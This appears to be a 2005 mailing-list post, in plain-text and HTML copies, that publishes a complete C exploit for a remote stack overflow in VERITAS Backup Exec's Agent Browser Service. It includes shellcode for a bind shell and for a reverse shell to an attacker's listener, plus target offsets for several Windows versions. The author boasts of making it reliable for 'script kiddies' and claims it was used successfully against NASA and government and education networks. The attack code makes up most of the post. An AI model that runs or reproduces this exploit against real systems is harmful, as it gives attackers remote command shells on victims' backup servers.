This is a multi-part message in MIME format. ------=_NextPart_000_003D_01C4F7DA.972C2380 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Because k-otik are poor looser not respecting the publication of = metasploit 2.3 , im forced to post my code. /* VERITAS Backup Exec v9.1.4691.SP1 v9.1.4691.SP0 v8.5.3572 Agent Browser Service, Remote Stack Overflow Highly Critical All credits to:=20 -iDEFENSE(discovery-www.iDEFENSE.com),=20 -Thor Doomen(iat-syscall[at]inbox.lv),=20 -H.D. Moore(scode-www.metasploit.com), -Matt Miller(scode-www.hick.org) ExtraNotes: All my tests/debugs where a bit long (some days) firstly due to the big = size of Backup Exec and the unstability accross differents windows versions to make working that IAT method with 100% success and the difficulty to = debug it. (As a recall, due to the 60 bytes only free, a tiny shellcode is send in = first to scan the recv function of benetns.exe and jump to the data submitted during = the second send, thanx syscall. Let's think large now. Imagine that you exploits the hole = and you submit the shellcode 5 minutes later, the service will hang on to death of = course until a kill, now imagine that you exploits the hole and you submit the shellcode too = faslty for the, computer processing, the shellcode can be missed, wont be executed = again, sometimes yes/no, but really unstable.=20 Hopefully (or unfortunely for you admin :>) I'm here to optimize it and = make it 100% working, universal, stable whatever you want for the good fortune of script kiddies and to = show what mean working to my good friends ka-odick :> Tries Machine Bind / Rverse / Success (2x) Win2k SP4 Server English 10 10 20 (1x) Win2k SP4 Pro English 5 5 10 (1x) WinXP SP1 Pro English 5 5 10 (1x) WinXP SP1a Pro English 5 5 10 (3x) Win2003 SP0 Server English 5 5 10 (1x) Win2003 SP0 Server Ita. 5 5 10 (1x) NT4 Server English. 5 5 10 =3D Universal v0.1: C code based on Thor Doomen's code posted at the metasploit mailing = list, excellent in the method, but super unstable to not say not working when = used, made some changes. v0.2: fix of the first big problem , the missed shellcode accross differents = windows,=20 fixed by flooding benetns with more sends, timer really small, this is = important. padding 1 nop to the reverse shellcode as needed, else crash on reverse. v0.3: universal esi call across v9.1 SP0 and SP1, for the good fortune of = script kiddies. v0.4: As a warning, this poc v0.4 as been tested working by an anonymous = tester (never mentionned there) on some organisations such nasa, states/edus, it's urgent to update 1 = month after the advisory, sleepers. Tips: -make sure that your ip is safe of null bytes in reverse mode. -make sure that you targets the good version of Backup Exec, else you crash it. -Backup Exec v10.0 is now available, get it at www.veritas.com. -Visit dfind.kd-team.com for a patched benetns.exe, quick solution=20 for an urgent update. (extracted from the hotfix at www.veritas.com) Backup Exec 9.x is tested safe after replacing the .exe Greetings:=20 Nima Majidi Behrang Fouladi Pejman keystr0ke JGS DiabloHorn kimatrix NaV New Metasploit v2.3 (http://www.metasploit.com/) and all idlers of #n3ws on Eris Free Network. by class101 [at] hat-squad.com answering to all stupid questions that I got & will have, no I'm not = persian and you don't care where I come from. 04 January 2005 */ #include #include #include #ifdef WIN32 #include "winsock2.h" #pragma comment(lib, "ws2_32") #else #include #include #include #include #include #include #include #include #include #include #endif char scode1[]=3D file://Matt Millers 'skape' shellcode. "\x90" // pad needed their for me, if you get scode detection problems = on slow connections, file://try to add more NOP and make sure to update the memcpys later in = the code. "\xeb\x6e\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0d\x56\x8b\x40\x0c\x8b\x70= \x1c\xad" "\x8b\x40\x08\x5e\xc3\x8b\x40\x34\x83\xc0\x7c\x8b\x40\x3c\xc3\x60\x8b\x6c= \x24\x24" "\x8b\x45\x3c\x8b\x7c\x05\x78\x03\xfd\x8b\x4f\x18\x8b\x5f\x20\x03\xdd\xe3= \x33\x49" "\x8b\x34\x8b\x03\xf5\x33\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x03= \xd0\xeb" "\xf4\x3b\x54\x24\x28\x75\xe2\x8b\x5f\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5f= \x1c\x03" "\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c\x61\xc3\xeb\x35\xad\x50\x52\xe8= \xa9\xff" "\xff\xff\x89\x07\x83\xc4\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e= \xec\x72" "\xfe\xb3\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xec\xf9\xaa= \x60\xcb" "\xed\xfc\x3b\xe7\x79\xc6\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9= \xff\xff" "\xff\x5e\xe8\x47\xff\xff\xff\x8b\xd0\x83\xee\x2e\x8d\x7d\x04\x8b\xce\x83= \xc1\x10" "\xe8\xa5\xff\xff\xff\x83\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73= \x32\x5f" "\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\xff\xb8= \x01\x63" "\x6d\x64\xc1\xf8\x08\x50\x89\x65\x30\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54= \x83\xc0" "\x72\x50\xff\x55\x1c\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x14= \x8b\xf0" "\x68\x7f\x01\x01\x01\xb8\x02\x01\x11\x5c\xfe\xcc\x50\x8b\xdc\x33\xc0\xb0= \x10\x50" "\x53\x56\xff\x55\x18\x33\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa= \x5f\xc6" "\x07\x44\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d= \x77\x44" "\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x30\x50\xff\x55\x08\xf7= \xd0\x50" "\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55\x20\xff\x55\x0c\x90\x90\x90\x90= \x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90= \x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90= \x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90= \x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90= \x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90= \x90\x90"; char scode2[]=3D file://HD.Moore Shellcode file://"\x90" uncomment this if you have scode detection problem on = slows connections or try more NOP, file://but for me and some other guys its already fine like this. "\xEB" "\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC= \xFF\xFF" "\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03= \xDC\x8D" "\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89= \x66\xB9" "\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4= \xAC\x9C" "\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C= \x03\x89" "\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03= \x91\x03" "\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E= \x01\x4F" "\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89= \x88\x88" "\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25= \xA6\x61" "\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3= \xA8\xD9" "\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77= \xDD\x8C" "\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8= \xD8\xD8" "\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED= \x01\x68" "\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8= \x01\x4F" "\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1= \x7B\x23" "\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4= \x89\x89" "\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8= \xD9\xD9" "\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD= \x8C\x77" "\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77= \x77\x77" "\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53= \xDB\x77" "\x58\x68\x61\x63\x6B\x90"; =20 static char payload[800]; char v91sp0sp1[]=3D"\xFF\x50\x11\x40"; char esisp0sp1[]=3D"\xA1\xFF\x42\x01"; char v85[]=3D"\xFF\x38\x11\x40"; char esiold[]=3D"\xB9\x08\x43\x01"; char talk[] =3D "\x02\x00\x32\x00" "\x90\x90\x90\x90" "\x31\xF6\xC1\xEC\x0C\xC1\xE4\x0C\x89\xE7\x89\xFB\x6A\x01\x8B\x74" "\x24\xFE\x31\xD2\x52\x42\xC1\xE2\x10\x52\x57\x56\xB8\x00\x00\x00" "\x00\xC1\xE8\x08\xFF\x10\x85\xC0\x79\x07\x89\xDC\x4E\x85\xF6\x75" "\xE1\xFF\xE7\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x00" "1.1.1.1.1.1" "\x00" "\xEB\x80"; #ifdef WIN32 WSADATA wsadata; #endif void ver(); void usage(char* us); int main(int argc,char *argv[]) { ver(); unsigned long gip; unsigned short gport; char *os; if = (argc>6||argc<3||atoi(argv[1])>2||atoi(argv[1])<1){usage(argv[0]);return = -1;}=20 if (argc=3D=3D5){usage(argv[0]);return -1;}=20 if (strlen(argv[2])<7){usage(argv[0]);return -1;}=20 if (argc=3D=3D6) { if (strlen(argv[4])<7){usage(argv[0]);return -1;}=20 } #ifndef WIN32 if (argc=3D=3D6) { gip=3Dinet_addr(argv[4])^(long)0x00000000; gport=3Dhtons(atoi(argv[5]))^(short)0x0000; } #define Sleep sleep #define SOCKET int #define closesocket(s) close(s) #else if (WSAStartup(MAKEWORD(2,0),&wsadata)!=3D0){printf("[+] wsastartup = error\n");return -1;} if (argc=3D=3D6) { gip=3Dinet_addr(argv[4])^(ULONG)0x00000000; gport=3Dhtons(atoi(argv[5]))^(USHORT)0x0000; } #endif int ip=3Dhtonl(inet_addr(argv[2])), port; if (argc=3D=3D4||argc=3D=3D6){port=3Datoi(argv[3]);} else port=3D6101; SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server; s=3Dsocket(AF_INET,SOCK_STREAM,0); if (s=3D=3D-1){printf("[+] socket() error\n");return -1;}=20 if (atoi(argv[1])=3D=3D1) {memcpy(&talk[37], &v91sp0sp1, = 4);memcpy(&talk[72], &esisp0sp1, 4);os=3D"Backup Exec v9.1.4691.1\n[+] = Backup Exec v9.1.4691.0";} else {memcpy(&talk[37], &v85, 4);memcpy(&talk[72], &esiold, = 4);os=3D"Backup Exec v8.5.3572";} if (argc=3D=3D6) { memcpy(&scode1[282], &gip, 4); memcpy(&scode1[289], &gport, 2); strcat(payload,scode1); } else strcat(payload,scode2); printf("[+] target(s): %s\n",os); =20 server.sin_family=3DAF_INET; server.sin_addr.s_addr=3Dhtonl(ip); server.sin_port=3Dhtons(port); connect(s,( struct sockaddr *)&server,sizeof(server)); timeout.tv_sec=3D3;timeout.tv_usec=3D0;FD_ZERO(&mask);FD_SET(s,&mask); switch(select(s+1,NULL,&mask,NULL,&timeout)) { case -1: {printf("[+] select() error\n");closesocket(s);return -1;} case 0: {printf("[+] connect() error\n");closesocket(s);return -1;} default: if(FD_ISSET(s,&mask)) { printf("[+] connected, constructing the payload...\n"); if (send(s,talk,sizeof(talk)-1,0)=3D=3D-1) { printf("[+] sending = error 1, the server prolly rebooted.\n");return -1;} #ifdef WIN32 Sleep(10); #else Sleep(1/100); #endif if (send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending = error 2, the server is patched.\n");return -1;} #ifdef WIN32 Sleep(10); #else Sleep(1/100); #endif if (send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending = error 3, the server is patched.\n");return -1;} #ifdef WIN32 Sleep(10); #else Sleep(1/100); #endif if (send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending = error 4, the server is patched.\n");return -1;} #ifdef WIN32 Sleep(10); #else Sleep(1/100); #endif if (send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending = error 5, the server is patched.\n");return -1;} #ifdef WIN32 Sleep(10); #else Sleep(1/100); #endif if (send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending = error 6, the server is patched.\n");return -1;} #ifdef WIN32 Sleep(10); #else Sleep(1/100); #endif if (send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending = error 7, the server is patched.\n");return -1;} #ifdef WIN32 Sleep(10); #else Sleep(1/100); #endif if (send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending = error 8, the server is patched.\n");return -1;} #ifdef WIN32 Sleep(1000); #else Sleep(1); #endif =20 printf("[+] size of payload: = %d\n",(sizeof(talk)-1)+strlen(payload)*7); =20 printf("[+] payload sent.\n"); return 0; } } closesocket(s); #ifdef WIN32 WSACleanup(); #endif return 0; } void usage(char* us)=20 { =20 printf("USAGE:\n"); printf(" [+] . 101_BXEC.exe Version VulnIP\n"); printf(" [+] . 101_BXEC.exe Version VulnIP VulnPORT\n"); printf(" [+] . 101_BXEC.exe Version VulnIP VulnPORT GayIP = GayPORT\n"); printf("VERSION: \n"); printf(" [+] 1. Backup Exec v9.1.4691.SP1\n"); printf(" [+] 1. Backup Exec v9.1.4691.SP0\n"); printf(" [+] 2. Backup Exec v8.5.3572\n"); printf("TARGET: \n"); printf(" [+] . 2k3/2k/XP/NT4 universal (*)\n"); printf("NOTE: \n"); printf(" The exploit bind a cmdshell port 101 or\n"); printf(" reverse a cmdshell on your listener.\n"); printf(" A wildcard (*) mean tested working.\n"); printf(" Compilation msvc6, cygwin, Linux.\n"); return; }=20 void ver() {=20 printf(" = \n"); printf(" = =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D[0.4= ]=3D=3D=3D=3D=3D=3D=3D=3D\n"); printf(" = =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3DVERITAS Backup Exec = 8.x/9.x=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\n");=20 printf(" =3D=3D=3D=3D=3D=3D=3D=3D=3DAgent Browser Service, = Remote Stack Overflow=3D=3D=3D=3D=3D=3D=3D=3D\n"); printf(" =3D=3D=3D=3D=3D=3Dcoded by = class101=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D[Hat-Squad.com = 2005]=3D=3D=3D=3D=3D\n"); printf(" = =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\n"); printf(" = \n"); } ------------------------------------------------------------- class101 Hat-Squad.com ------------------------------------------------------------- ------=_NextPart_000_003D_01C4F7DA.972C2380 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            

            Because k-otik are poor looser not =
respecting the=20
publication of metasploit 2.3 , im forced to post my code.
            

             
            

            /*
            VERITAS Backup Exec=20
v9.1.4691.SP1
                     &n=
bsp;         =20
v9.1.4691.SP0
                 v8.5.3572
            Agent =
Browser=20
Service, Remote Stack Overflow
            

             
            

            Highly Critical
            

             
            

            All credits to: 
            

             
            

            -iDEFENSE(discovery-www.iDEFENSE.com), =

            -Thor=20
Doomen(iat-syscall[at]inbox.lv), 
            -H.D.=20
Moore(scode-www.metasploit.com),
            -Matt=20
Miller(scode-www.hick.org)
            

             
            

            ExtraNotes:
            

             
            

            All my tests/debugs where a bit long =
(some days)=20
firstly due to the big size
            of Backup Exec and the unstability =
accross=20
differents windows versions
            to make working that IAT method with 100% =
success=20
and the difficulty to debug it.
            (As a recall, due to the 60 bytes =
only free,=20
a tiny shellcode is send in first to scan
            the recv function of =
benetns.exe=20
and jump to the data submitted during the second send,
            thanx syscall. =
Let's=20
think large now. Imagine that you exploits the hole and you =
submit
            the=20
shellcode 5 minutes later, the service will hang on to death of course =
until a=20
kill,
            now imagine that you exploits the hole and you submit the =
shellcode too=20
faslty for the,
            computer processing, the shellcode can be missed, =
wont be=20
executed again, sometimes yes/no, but really unstable. 
            Hopefully (or =

unfortunely for you admin :>) I'm here to optimize it and make it =
100%=20
working, universal,
            stable whatever you want for the good fortune of =
script=20
kiddies and to show what mean working to my good
            friends ka-odick=20
:>
                      &nbs=
p;            =
;            =
            &=
nbsp;=20
Tries
              =20
Machine          =
 Bind  /=20
Rverse / Success
            

             
            

             (2x) Win2k SP4   Server =

English     =20
10       =20
10       20
             (1x) Win2k =
SP4  =20
Pro    English      =20
5        =20
5       10
             (1x) WinXP =
SP1  =20
Pro    English      =20
5        =20
5       10
             (1x) WinXP SP1a =20
Pro    English      =20
5        =20
5       10
             (3x) Win2003 SP0 =
Server=20
English      =20
5        =20
5       10
             (1x) Win2003 SP0 =
Server=20
Ita.         =20
5        =20
5       10
             (1x)=20
NT4         Server=20
English.     =20
5        =20
5       10
            

             
            

                      &nbs=
p; =3D=20
Universal
            

             
            

            v0.1:
            C code based on Thor Doomen's =
code posted=20
at the metasploit mailing list,
            excellent in the method, but super =
unstable=20
to not say not working when used,
            made some changes.
            

             
            

            v0.2:
            fix of the first big problem , =
the missed=20
shellcode accross differents windows, 
            fixed by flooding benetns with =
more=20
sends, timer really small, this is important.
            padding 1 nop to the =
reverse=20
shellcode as needed, else crash on reverse.
            

             
            

            v0.3:
            universal esi call across v9.1 =
SP0 and=20
SP1, for the good fortune of script kiddies.
            

             
            

            v0.4:
            As a warning, this poc v0.4 as =
been tested=20
working by an anonymous tester (never mentionned there)
            on some =
organisations=20
such nasa, states/edus, it's urgent to update 1 month after the =
advisory,=20
sleepers.
            

             
            

            Tips: -make sure that your ip is safe =
of null bytes=20
in reverse mode.
                  -make sure that you =
targets=20
the good version of Backup Exec,
                  else =
you=20
crash it.
               -Backup Exec v10.0 is now available, get it at =
www.veritas.com.
               =
-Visit=20
dfind.kd-team.com for a patched benetns.exe, quick solution =

               for=20
an urgent update. (extracted from the hotfix at www.veritas.com)
               =
;  =20
Backup Exec 9.x is tested safe after replacing the .exe
            

             
            

            Greetings: 
               Nima=20
Majidi
               Behrang Fouladi
               =
Pejman
              =20
keystr0ke
               JGS
               DiabloHorn
               =

kimatrix
               NaV
               New Metasploit v2.3 (http://www.metasploit.com/)
            &=
nbsp; =20
and all idlers of #n3ws on Eris Free Network.
            

             
            

            by class101 [at] =
hat-squad.com
            answering to all=20
stupid questions that I got & will have, no I'm not persian and you =
don't=20
care where I come from.
            

             
            

            04 January 2005
            */
            #include=20
<stdio.h>
            #include <string.h>
            #include=20
<time.h>
            #ifdef WIN32
            #include "winsock2.h"
            #pragma =
comment(lib,=20
"ws2_32")
            #else
            #include <sys/socket.h>
            #include=20
<sys/types.h>
            #include <netinet/in.h>
            #include=20
<netinet/in_systm.h>
            #include <netinet/ip.h>
            #include=20
<netdb.h>
            #include <arpa/inet.h>
            #include=20
<unistd.h>
            #include <stdlib.h>
            #include=20
<fcntl.h>
            #endif
            

             
            

            char scode1[]=3D
            file://Matt Millers 'skape' =
shellcode.
            "\x90"  //=20
pad needed their for me, if you get scode detection problems on slow=20
connections,
            file://try to add more NOP =
and make=20
sure to update the memcpys later in the=20
code.
            "\xeb\x6e\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0d\x56\x8b\x40\x0=
c\x8b\x70\x1c\xad"
            "\x8b\x40\x08\x5e\xc3\x8b\x40\x34\x83\xc0\x7c\x8b\x=
40\x3c\xc3\x60\x8b\x6c\x24\x24"
            "\x8b\x45\x3c\x8b\x7c\x05\x78\x03\xfd\=
x8b\x4f\x18\x8b\x5f\x20\x03\xdd\xe3\x33\x49"
            "\x8b\x34\x8b\x03\xf5\x33=
\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x03\xd0\xeb"
            "\xf4\x3b\x5=
4\x24\x28\x75\xe2\x8b\x5f\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5f\x1c\x03""\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c\x61\xc3\xeb\x35\xad\x50\x52\xe=
8\xa9\xff"
            "\xff\xff\x89\x07\x83\xc4\x08\x83\xc7\x04\x3b\xf1\x75\xec\x=
c3\x8e\x4e\x0e\xec\x72"
            "\xfe\xb3\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\=
xd9\x09\xf5\xad\xec\xf9\xaa\x60\xcb"
            "\xed\xfc\x3b\xe7\x79\xc6\x79\x83=
\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff"
            "\xff\x5e\xe8\x47\xf=
f\xff\xff\x8b\xd0\x83\xee\x2e\x8d\x7d\x04\x8b\xce\x83\xc1\x10"
            "\xe8\x=
a5\xff\xff\xff\x83\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5=
f"
            "\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\x=
ff\xb8\x01\x63"
            "\x6d\x64\xc1\xf8\x08\x50\x89\x65\x30\x33\xc0\x66\xb8\=
x90\x01\x2b\xe0\x54\x83\xc0"
            "\x72\x50\xff\x55\x1c\x33\xc0\x50\x50\x50=
\x50\x40\x50\x40\x50\xff\x55\x14\x8b\xf0"
            "\x68\x7f\x01\x01\x01\xb8\x0=
2\x01\x11\x5c\xfe\xcc\x50\x8b\xdc\x33\xc0\xb0\x10\x50"
            "\x53\x56\xff\x=
55\x18\x33\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x5f\xc6"
            "\=
x07\x44\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d\x=
77\x44"
            "\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x30\x50\xff\=
x55\x08\xf7\xd0\x50"
            "\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55\x20\xff=
\x55\x0c\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x9=
0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x=
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\=
x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"<=
BR>"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\=
x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
\x90\x90\x90\x90\x90\x90";
            

             
            


            char scode2[]=3D
            file://HD.Moore Shellcode
            file://"\x90"   uncomment this if =
you have=20
scode detection problem on slows connections or try more NOP,
            file://but for me and some other guys its =
already fine=20
like=20
this.
            "\xEB"
            "\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\=
xF4\xEB\x05\xE8\xEC\xFF\xFF"
            "\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF=
\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
            "\xF0\x89\x62\x03\xC2\x90\x0=
3\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
            "\x77\x74\xB9\x=
48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
            "\=
xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x=
03\x89"
            "\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\=
xD1\xEC\x03\x91\x03"
            "\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0=
\x06\xC6\x86\x64\x77\x5E\x01\x4F"
            "\x09\x64\x88\x89\x88\x88\xDF\xDE\xD=
B\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
            "\x3E\x91\x90\x6F\x2C\x=
91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
            "\x51\x81\=
x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"<=
BR>"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\=
x77\xDD\x8C"
            "\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8=
\xB9\x48\xD8\xD8\xD8\xD8"
            "\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x5=
3\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
            "\xE2\x98\xD8\xDF\x77\xDD\xAC\x=
DB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
            "\xE0\xCB\xC5\xCC\=
x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
            "\x0F=
\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\=
x89"
            "\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98=
\xDC\xD8\xD9\xD9"
            "\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xF=
A\x76\x3B\x9E\x77\xDD\x8C\x77"
            "\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x=
8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
            "\x77\x77\xBE\x77\x5B\x77\=
xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
            "\x58\x68\x61=
\x63\x6B\x90"; =20

            

             
            

            static char payload[800];
            char=20
v91sp0sp1[]=3D"\xFF\x50\x11\x40";
            char =
esisp0sp1[]=3D"\xA1\xFF\x42\x01";
            char=20
v85[]=3D"\xFF\x38\x11\x40";
            char =
esiold[]=3D"\xB9\x08\x43\x01";
            

             
            

            char talk[]=20
=3D
            "\x02\x00\x32\x00"
            "\x90\x90\x90\x90"
            "\x31\xF6\xC1\xEC\x0C\=
xC1\xE4\x0C\x89\xE7\x89\xFB\x6A\x01\x8B\x74"
            "\x24\xFE\x31\xD2\x52\x42=
\xC1\xE2\x10\x52\x57\x56\xB8\x00\x00\x00"
            "\x00\xC1\xE8\x08\xFF\x10\x8=
5\xC0\x79\x07\x89\xDC\x4E\x85\xF6\x75"
            "\xE1\xFF\xE7\x90\x90\x90\x90\x=
90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\=
x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90=
\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9=
0\x90\x90\x90\x90"
            "\x00"
            "1.1.1.1.1.1"
            "\x00"
            "\xEB\x80";
            

             
            

            #ifdef WIN32
             WSADATA=20
wsadata;
            #endif
            

             
            

            void ver();
            void usage(char* =
us);
            

             
            

            int main(int argc,char=20
*argv[])
            {
             ver();
             unsigned long =
gip;
